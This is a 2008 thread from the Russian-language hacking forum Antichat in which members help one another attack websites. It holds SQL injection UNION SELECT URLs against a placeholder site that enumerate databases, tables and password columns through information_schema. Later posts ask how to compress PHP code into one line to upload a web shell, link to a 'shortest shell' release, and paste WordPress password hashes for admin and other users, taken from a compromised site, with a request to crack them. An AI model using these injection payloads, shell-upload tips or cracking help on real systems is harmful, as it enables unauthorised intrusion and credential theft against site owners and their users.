ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.11.2008, 09:35
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --
таким запросом ты узнаеш все бд )
а вот таким запросом ты посмотришь БД в которых лежит таблица..
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name= азвание таблы--
а вобще я бы сначало искал в каких таблицах и бд есть колонка например пасс)
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name),4,5,6,7,8+from+information.columns+where+ column_name+like+char(название поля)--
Последний раз редактировалось sabe; 27.11.2008 в 19:59..
|
|
|
27.11.2008, 09:50
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от sabe
_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --
таким запросом ты узнаеш все бд )
table_schema - имя БД
table_NAME - имя таблицы
а вот таким запросом ты посмотришь названия таблиц и названия БД в которых они лежат..
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name=н азвание таблы--
А это что за бред???? Этим запросом ты посмотришь имя БД в которой лежит таблица " название таблы"
PS Мужики читайте литературу, я смотрю вы нахватались кусков из хеккерских форумов, а работать с БД не умеете.
|
|
|
|
27.11.2008, 10:34
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Всем спасибо!
Все что нужно стянул.
sabe, a+
|
|
|
|
27.11.2008, 11:18
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2pantera прав хватает по любому) потому что этот файл index.php этого же сайта)
|
|
|
|
27.11.2008, 12:31
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633
Репутация:
155
|
|
вопрос..как преобразовать пхп-код в одну строку?иными словами чтобы не было пробелов...всё в одной строке?
шелл короче залить..
|
|
|
|
27.11.2008, 12:43
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Попробуй перевести его в16битное шифрование.
Последний раз редактировалось -m0rgan-; 27.11.2008 в 12:47..
|
|
|
|
27.11.2008, 13:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от _Pantera_
Да ты ж синтаксиса sql команд не понимаешь!!! Доки читай по мускулу! хеккеры млин...
хех товарищ хакер обратите внимание на эти строчки в цитате:
ошибка: Table 'db.routines' doesn't exist ага, значит все в другой базе. далее смотрю в какой именно базе: отображается "information_schema"
во первых он сделал это без вас, во-вторых зачем ему весь список "баз(а/ы)-таблицы" если известно конкретное название таблицы?) пост sabe верный ток там оператор объединения непонятно зачем)
Octave_Parango значит либо нет записей либо есть пустые строки 
masternet пхп шелл итак занимает 1 строчку всё остальное навороты
вот самый короткий) raz0r.name/releases/mega-reliz-samyj-korotkij-shell/
|
|
|
|
27.11.2008, 14:49
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от l1ght
хех товарищ хакер обратите внимание на эти строчки в цитате:
ошибка: Table 'db.routines' doesn't exist ага, значит все в другой базе. далее смотрю в какой именно базе: отображается "information_schema"
во первых он сделал это без вас, во-вторых зачем ему весь список "баз(а/ы)-таблицы" если известно конкретное название таблицы?) пост sabe верный ток там оператор объединения непонятно зачем) Ошибка говорит о том, что в БД под именем db таблицы "routines" не существует!
А дальше ты хоть сам понял, что написал?
далее смотрю в какой именно базе: отображается "information_schema"
Интересно, что тогда по твоему "information_schema", таблица чтоле?
information_schema - это название стандартной БД в мускуле 5!)
|
|
|
|
27.11.2008, 15:00
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Товарищи, прошу совета.
Добил необходимый мне ресурс. Там стоит походу вродпресс.
Вытащил значит следующие данные
(логин::пасс)
admin::$P$BaDgEI.EOMBqxOK7SWSWJfbPHfiVDT.
mary::$P$BQOOK8uZGPy9aPW/iZFQdVCYqfFEIe/
tom::$P$BMUL.P.H2ij4tFvv0RcZ.moF0RWId10
Это что вообще такое? o_O Это расшифровать реально (если это вообще хэши)?
Если да-то ткните как плз.
Я просто первый раз столкнулся, в недоумении...
|
|
|
|
27.11.2008, 15:02
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
похоже на юниксовый мд5, но там вроде на $1$ начинаться должно...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
